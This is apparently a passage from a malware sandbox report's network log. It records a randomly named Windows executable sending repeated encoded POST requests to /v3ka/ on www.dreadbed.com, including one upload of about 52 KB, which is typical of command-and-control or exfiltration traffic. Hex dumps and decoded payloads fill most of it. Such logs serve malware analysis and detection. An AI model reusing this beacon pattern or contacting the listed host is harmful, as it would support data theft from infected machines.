20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewp
Feb 28, 2024 15:45:17.557383060 CET	1286	IN	Data Raw: 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65 74 68 69 6e 67 20 6c 6f 73 Data Ascii: ort" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href
Feb 28, 2024 15:45:17.557424068 CET	164	IN	Data Raw: 78 3b 22 20 63 6c 61 73 73 3d 22 73 75 62 2d 68 65 61 64 65 72 20 74 65 78 74 2d 62 6c 6f 63 6b 2d 6e 61 72 72 6f 77 22 3e 54 68 69 73 20 69 73 20 6e 6f 74 20 61 20 66 61 75 6c 74 2c 20 6a 75 73 74 20 61 6e 20 61 63 63 69 64 65 6e 74 20 74 68 61 Data Ascii: x;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not intentional.</p> </div> </div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	50236	198.54.117.242	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:45:23.096946955 CET	724	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.dreadbed.com Origin: http://www.dreadbed.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 Referer: http://www.dreadbed.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 33 73 35 7a 48 6f 33 43 4b 67 67 73 45 41 77 43 32 7a 73 4a 50 73 43 55 42 35 63 76 31 57 4f 50 71 47 36 45 7a 64 6d 39 51 38 45 68 72 43 48 74 7a 38 61 64 68 6f 54 43 2f 4a 6b 6d 50 32 4e 50 4d 6c 41 71 4a 51 4c 72 5a 6c 56 43 53 4b 35 6f 74 4d 4f 42 2b 70 4d 4e 7a 72 58 57 54 74 52 73 48 37 2b 73 38 65 70 70 73 4f 4d 36 37 49 48 36 78 47 2b 43 6e 4a 67 5a 39 6b 6f 48 2b 44 78 6b 45 63 5a 78 47 61 6f 6d 74 34 35 4c 38 4c 55 6a 42 64 4d 43 59 53 57 77 55 54 78 30 42 32 30 79 32 4d 2b 31 46 58 71 76 48 54 48 5a 7a 75 56 4c 6f 45 6c 37 63 66 39 76 56 6e 57 68 35 4d 4e 6f 62 67 3d 3d Data Ascii: nf8dPP8p=3s5zHo3CKggsEAwC2zsJPsCUB5cv1WOPqG6Ezdm9Q8EhrCHtz8adhoTC/JkmP2NPMlAqJQLrZlVCSK5otMOB+pMNzrXWTtRsH7+s8eppsOM67IH6xG+CnJgZ9koH+DxkEcZxGaomt45L8LUjBdMCYSWwUTx0B20y2M+1FXqvHTHZzuVLoEl7cf9vVnWh5MNobg==
Feb 28, 2024 15:45:23.424931049 CET	324	IN	HTTP/1.1 403 Forbidden Date: Wed, 28 Feb 2024 14:45:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Server: namecheap-nginx Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Vp/JLII&T";Ct@}4l"(//=3YNf>%mx0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	50237	198.54.117.242	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:45:25.858242989 CET	1064	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.dreadbed.com Origin: http://www.dreadbed.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 545 Cache-Control: max-age=0 Referer: http://www.dreadbed.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 33 73 35 7a 48 6f 33 43 4b 67 67 73 48 68 41 43 36 77 55 4a 4b 4d 43 62 4e 5a 63 76 73 6d 4f 44 71 47 32 45 7a 63 7a 6c 51 76 73 68 6f 67 66 74 79 39 61 64 6b 6f 54 43 77 70 6b 76 46 57 4d 44 4d 6c 4e 5a 4a 55 4c 72 5a 6c 70 43 54 34 78 6f 35 73 4f 4f 78 4a 4d 4f 30 72 58 74 58 74 52 59 48 37 36 42 38 65 4e 70 73 39 59 36 36 4c 76 36 69 6a 53 44 74 4a 67 66 73 30 70 52 33 6a 78 6d 45 63 56 50 47 62 52 62 74 75 52 4c 35 62 30 6a 41 64 4d 42 53 69 57 7a 61 44 78 6a 42 55 64 42 76 39 71 71 45 6b 65 47 4f 41 66 34 75 4f 55 48 6c 79 5a 7a 44 4d 31 44 53 56 2f 7a 73 59 41 61 4c 6e 2b 45 4b 78 73 43 63 59 4b 45 6c 5a 63 2f 79 72 75 4d 51 2f 67 65 73 79 47 68 63 35 48 4a 51 63 4e 53 6a 62 72 52 6a 7a 65 68 70 79 73 4a 70 4c 72 6a 43 4f 6d 36 49 62 6e 6c 4a 69 4d 30 31 56 42 52 2f 72 56 75 75 39 77 32 32 7a 54 57 32 44 78 56 50 76 69 59 75 32 30 64 64 73 4e 74 75 70 47 33 37 37 68 56 47 79 74 5a 34 63 4b 65 59 2b 69 36 2f 35 41 46 67 30 37 4d 30 36 79 6e 77 65 51 59 4b 76 6d 2b 66 64 37 42 34 45 33 72 4f 68 4d 4d 75 71 41 37 53 47 72 46 63 7a 41 35 53 61 4b 50 73 55 65 4e 58 34 6a 4b 6d 46 76 33 7a 51 50 70 33 4c 38 53 2f 74 66 57 73 61 6c 6e 38 4e 6a 39 5a 78 63 54 45 54 4c 4b 68 38 37 6d 49 4e 33 73 4c 63 32 42 33 39 34 65 6e 58 4a 34 7a 38 45 46 6c 73 6f 44 49 59 4a 2f 67 54 6d 6b 68 2f 78 35 62 32 55 71 6c 52 72 79 30 4b 41 33 4d 48 52 72 74 30 53 65 2b 59 2b 4a 79 4b 53 72 4b 67 64 6d 31 33 37 39 31 2b 64 49 6c 62 42 56 37 4e 46 79 59 4e 58 34 77 77 41 70 2f 41 4e 4f 43 38 2b 76 74 6a 7a 41 6c 72 4d 6a 6f 48 56 44 4c 6d 38 6a 56 32 32 44 33 2b 50 68 2f 33 4e 74 45 44 65 4d 76 4b 30 3d Data Ascii: nf8dPP8p=3s5zHo3CKggsHhAC6wUJKMCbNZcvsmODqG2EzczlQvshogfty9adkoTCwpkvFWMDMlNZJULrZlpCT4xo5sOOxJMO0rXtXtRYH76B8eNps9Y66Lv6ijSDtJgfs0pR3jxmEcVPGbRbtuRL5b0jAdMBSiWzaDxjBUdBv9qqEkeGOAf4uOUHlyZzDM1DSV/zsYAaLn+EKxsCcYKElZc/yruMQ/gesyGhc5HJQcNSjbrRjzehpysJpLrjCOm6IbnlJiM01VBR/rVuu9w22zTW2DxVPviYu20ddsNtupG377hVGytZ4cKeY+i6/5AFg07M06ynweQYKvm+fd7B4E3rOhMMuqA7SGrFczA5SaKPsUeNX4jKmFv3zQPp3L8S/tfWsaln8Nj9ZxcTETLKh87mIN3sLc2B394enXJ4z8EFlsoDIYJ/gTmkh/x5b2UqlRry0KA3MHRrt0Se+Y+JyKSrKgdm13791+dIlbBV7NFyYNX4wwAp/ANOC8+vtjzAlrMjoHVDLm8jV22D3+Ph/3NtEDeMvK0=
Feb 28, 2024 15:45:27.221620083 CET	324	IN	HTTP/1.1 403 Forbidden Date: Wed, 28 Feb 2024 14:45:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Server: namecheap-nginx Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Vp/JLII&T";Ct@}4l"(//=3YNf>%mx0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	50238	198.54.117.242	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:45:28.635708094 CET	7716	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.dreadbed.com Origin: http://www.dreadbed.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 52933 Cache-Control: max-age=0 Referer: http://www.dreadbed.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 33 73 35 7a 48 6f 33 43 4b 67 67 73 48 68 41 43 36 77 55 4a 4b 4d 43 62 4e 5a 63 76 73 6d 4f 44 71 47 32 45 7a 63 7a 6c 51 76 30 68 6f 56 44 74 7a 65 79 64 6e 6f 54 43 39 4a 6b 69 46 57 4e 5a 4d 6c 56 47 4a 55 48 37 5a 6a 6c 43 54 72 6c 6f 35 2f 32 4f 36 70 4d 4c 6f 37 58 56 54 74 52 4d 48 37 2b 56 38 64 77 63 73 4f 45 36 37 4a 33 36 78 6b 6d 43 73 5a 67 5a 73 30 70 57 7a 6a 78 55 45 63 52 66 47 62 64 62 74 6f 52 4c 2f 35 38 6a 47 4b 34 42 66 53 57 73 63 7a 78 6d 49 30 64 34 76 38 4f 45 45 6b 65 38 4f 44 54 34 75 4a 67 48 6b 31 31 77 44 73 31 44 4d 46 2f 30 39 49 45 65 4c 6e 79 6d 4b 78 6f 43 63 66 57 45 33 70 63 2f 35 75 61 50 45 76 67 59 6e 53 48 68 4e 70 37 42 51 63 49 6c 6a 5a 6e 52 6a 48 32 68 70 42 55 4a 36 71 72 6a 63 2b 6d 34 56 4c 6e 4d 41 43 4e 31 31 55 78 33 2f 6f 64 51 75 2b 38 32 30 53 7a 57 39 42 4a 61 50 50 69 65 68 57 30 49 5a 73 42 78 75 6f 72 6d 37 37 68 46 47 33 4e 5a 2f 74 36 65 5a 38 4b 31 37 70 41 66 35 6b 36 57 39 61 2f 6d 77 61 77 51 4b 76 75 55 66 63 76 42 33 45 33 72 49 41 4d 50 67 61 41 38 50 57 71 63 53 54 41 75 53 61 48 6d 73 52 2b 6e 58 4d 72 4b 6e 31 2f 33 6b 51 50 71 79 72 38 4a 32 4e 66 63 37 4b 6c 6e 38 4e 6e 50 5a 78 59 54 45 68 62 4b 6e 4c 66 6d 4e 65 66 73 4a 63 32 48 33 39 34 4c 6e 57 31 39 7a 2f 6c 6b 6c 73 34 70 49 62 6c 2f 67 47 4f 6b 6d 2b 78 32 66 47 55 76 68 52 72 62 72 61 4e 74 4d 48 4e 6a 74 30 44 6c 2f 71 36 4a 7a 4b 43 72 4f 67 64 6c 77 58 37 36 68 75 64 65 76 37 4d 4f 37 4e 5a 4d 59 4e 6a 4f 77 79 77 70 2f 6e 6b 79 52 76 79 30 35 78 6e 32 6e 71 39 55 35 32 39 32 42 47 41 6e 56 45 69 2b 30 62 66 51 34 48 39 38 59 51 32 62 79 4b 4b 47 47 59 6e 65 43 4c 6c 65 67 4e 41 2f 42 46 42 66 51 54 56 50 31 6c 41 67 71 44 4f 6c 67 7a 4c 66 62 79 65 44 55 5a 62 4d 6d 30 70 4b 6e 4b 33 6b 55 52 4d 46 48 55 48 51 4b 48 33 56 4a 5a 70 36 49 44 50 58 41 4a 58 5a 54 67 62 2b 53 5a 65 77 44 35 64 52 5a 4d 7a 46 34 6c 63 35 43 77 63 52 46 75 34 58 38 2f 73 42 59 4d 77 7a 34 2f 67 41 39 76 4e 4b 53 5a 78 75 46 4d 65 6c 4f 37 48 7a 5a 49 42 45 2b 75 73 75 6e 6c 42 58 4f 47 70 62 69 65 79 35 75 43 56 53 36 43 4e 36 4c 46 69 2b 30 48 5a 58 59 6f 54 58 30 56 46 76 53 53 76 5a 44 38 4b 72 49 2f 2f 4b 55 68 41 63 4a 65 6f 2b 59 43 74 69 73 76 6d 6c 33 62 76 63 7a 76 70 79 59 4f 6b 38 57 67 70 79 70 4e 72 42 4c 53 74 46 79 32 37 33 77 39 53 79 2f 6d 46 4a 71 42 46 4d 67 6e 6b 72 6b 6a 50 72 74 6a 4e 48 44 6a 4e 39 4f 6a 76 42 52 74 6c 63 2b 31 59 30 37 39 51 61 4a 38 38 49 72 76 66 77 6a 35 46 70 72 75 5a 6c 30 2f 32 4b 6d 2f 6e 57 61 71 42 37 52 72 56 58 63 33 61 4b 71 44 32 69 58 4a 73 54 6b 66 38 51 36 30 67 52 6a 44 63 62 74 39 6f 57 32 4b 2b 44 32 48 32 5a 44 74 4d 39 75 76 65 6a 4b 51 44 77 39 63 32 58 70 37 48 31 38 6f 6b 6f 53 68 52 32 39 57 57 49 79 47 74 2b 32 79 2f 52 49 6c 37 6e 41 69 62 6b 33 69 76 71 34 2b 59 56 63 71 79 41 66 44 6b 2b 70 77 50 37 55 37 51 52 2b 51 4d 79 42 35 6d 38 56 34 41 64 6e 44 72 37 6d 34 48 4c 2f 47 4b 4b 34 58 72 54 62 50 33 55 42 69 77 50 75 50 54 55 62 55 37 58 31 6f 34 64 79 2f 34 54 55 69 48 76 79 4d 4c 34 5a 4f 67 61 65 71 73 30 6c 41 36 43 41 6f 4a 79 7a 53 70 64 52 71 68 78 6e 41 73 58 6f 71 4a 63 4e 51 57 55 55 33 36 49 58 4a 31 41 66 38 50 61 42 64 4e 6d 47 2f 31 73 71 6f 76 50 56 67 66 52 64 30 59 74 51 36 38 73 57 34 2b 32 78 5a 58 48 6a 45 53 59 2f 73 68 6c 55 70 75 75 57 45 30 68 47 45 42 41 73 50 55 2b 31 45 6a 64 4c 2f 53 35 52 39 2f 54 61 43 33 36 58 2f 32 69 54 74 32 6a 72 79 73 39 47 6a 44 48 66 2b 39 41 37 36 74 44 79 6b 39 68 35 75 68 4b 34 63 6d 39 5a 78 43 36 44 2f 73 4f 65 37 6e 58 43 53 34 50 52 58 65 67 79 43 77 5a 49 2f 54 44 56 4e 68 6b 55 31 41 30 4c 55 45 2b 45 6f 78 54 38 34 64 66 44 50 4e 31 54 63 57 6f 6d 48 4f 62 48 62 45 79 44 51 6c 33 52 33 56 63 52 53 5a 75 57 58 2f 51 42 4d 72 4a 5a 34 32 78 63 7a 52 4f 52 71 4f 59 56 78 52 32 35 52 47 73 74 61 59 7a 39 4b 6b 53 4e 79 43 63 61 30 46 47 42 38 6d 42 4c 59 79 57 53 47 70 76 6e 32 61 65 38 48 71 55 75 67 47 33 70 51 69 4b 44 69 56 58 4f 66 47 46 6c 54 39 2f 76 64 6e 62 4d 32 63 41 6a 61 50 6b 30 71 41 78 78 41 30 49 79 56 32 4f 59 71 6b 38 48 42 Data Ascii: nf8dPP8p=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
Feb 28, 2024 15:45:28.635801077 CET	5144	OUT	Data Raw: 79 4d 4c 47 72 41 4a 6e 37 75 67 76 67 62 6f 76 33 72 46 42 35 53 4b 77 58 38 57 38 37 6b 37 6b 44 4f 45 79 47 76 78 74 53 67 68 4a 41 61 55 67 51 41 69 69 7a 64 51 69 4c 63 52 45 35 66 6c 77 32 39 6d 63 5a 35 57 69 31 38 6b 43 43 5a 6e 6b 77 52 Data Ascii: yMLGrAJn7ugvgbov3rFB5SKwX8W87k7kDOEyGvxtSghJAaUgQAiizdQiLcRE5flw29mcZ5Wi18kCCZnkwR3Eeb09Sj04UM3I86syBGRef+kOwoCsLq/Kdn+kAvmB3SjDmMVdhllV3fJtfRlhokEqD9LREcASk8ltLT8HFByxGNAL4D+fAdgZkWQ6qqnBWsFVpdZzaPXWy5PmPFJfEjdxV8yubz+VCovwMZtYAGFoh/ilUeAzUON
Feb 28, 2024 15:45:28.888516903 CET	5144	OUT	Data Raw: 4a 6d 72 45 34 51 43 4d 4c 45 31 47 54 34 2b 30 7a 54 4b 79 6b 4c 69 39 75 75 5a 53 48 59 46 6f 6e 2b 34 33 41 6d 7a 68 46 56 50 35 6e 5a 4f 49 35 46 57 78 68 66 7a 50 74 62 32 77 6a 35 49 76 4e 42 73 43 6f 64 47 49 47 57 69 71 69 4c 73 5a 4a 39 Data Ascii: JmrE4QCMLE1GT4+0zTKykLi9uuZSHYFon+43AmzhFVP5nZOI5FWxhfzPtb2wj5IvNBsCodGIGWiqiLsZJ9vXthP1ufzX7XYiYOdd2rEhtDDg7C67XK7wO22h6nkJaHiiZ+odbm7947Hf4LHCz80kj+LquGdZtT0lLM6kA+/GwVWoVzFcgPVT2wkU7+czvnadK545lBT/eydf9m7R9kZs1nnBf0EqM3FRVxaGduttRFAZRA4b9Qf
Feb 28, 2024 15:45:28.888631105 CET	1286	OUT	Data Raw: 4c 53 74 46 79 32 37 33 77 39 53 79 2f 6d 46 4a 71 42 46 4d 67 6e 6b 72 6b 6a 50 72 74 6a 4e 48 44 6a 4e 39 4f 6a 76 42 52 74 6c 63 2b 31 59 30 37 39 51 61 4a 38 38 49 72 76 66 77 6a 35 46 70 72 75 5a 6c 30 2f 32 4b 6d 2f 6e 57 61 71 42 37 52 72 Data Ascii: LStFy273w9Sy/mFJqBFMgnkrkjPrtjNHDjN9OjvBRtlc+1Y079QaJ88Irvfwj5FpruZl0/2Km/nWaqB7RrVXc3aKqD2iXJsTkf8Q60gRjDcbt9oW2K+D2H2ZDtM9uvejKQDw9c2Xp7H18okoShR29WWIyGt+2y/RIl7nAibk3ivq4+YVcqyAfDk+pwP7U7QR+QMyB5m8V4AdnDr7m4HL/GKK4XrTbP3UBiwPuPTUbU7X1o4dy/4
